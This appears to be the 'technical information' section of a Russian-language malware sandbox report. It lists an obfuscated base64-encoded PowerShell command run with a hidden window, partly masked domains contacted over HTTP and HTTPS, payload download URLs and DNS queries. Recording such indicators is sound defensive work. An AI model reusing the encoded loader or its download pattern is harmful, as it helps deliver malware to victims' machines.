Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AHcAUwBjAHIAYABpAFAAdAB9ACAAPQAgACYAKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAIAAnAG4AZQB3AC0AbwBiAGoAZQAnACwAJwB0ACcALAAnAGMAJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADMAfQB7ADAAfQB7AD...
- 'be#####iserrature.it':80
- 'be#####iserrature.it':443
- 'br##git.pt':80
- 'db##ett.com':80
- 'ar###ores.cl':80
- 'ar###ores.cl':443
- 'pk#.goog':80
- http://be#####iserrature.it/include/C/
- http://db##ett.com/YqsSad/
- http://ar###ores.cl/RfWMwd/
- http://pk#.goog/gsr1/gsr1.crt
- 'be#####iserrature.it':443
- 'ar###ores.cl':443
- DNS ASK be#####iserrature.it
- DNS ASK br##git.pt
- DNS ASK db##ett.com
- DNS ASK ar###ores.cl
- DNS ASK pk#.goog
- DNS ASK st###503.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AHcAUwBjAHIAYABpAFAAdAB9ACAAPQAgACYAKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAIAAnAG4AZQB3AC0AbwBiAGoAZQAnACwAJwB0ACcALAAnAGMAJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADMAfQB7ADAAfQB7AD...' (со скрытым окном)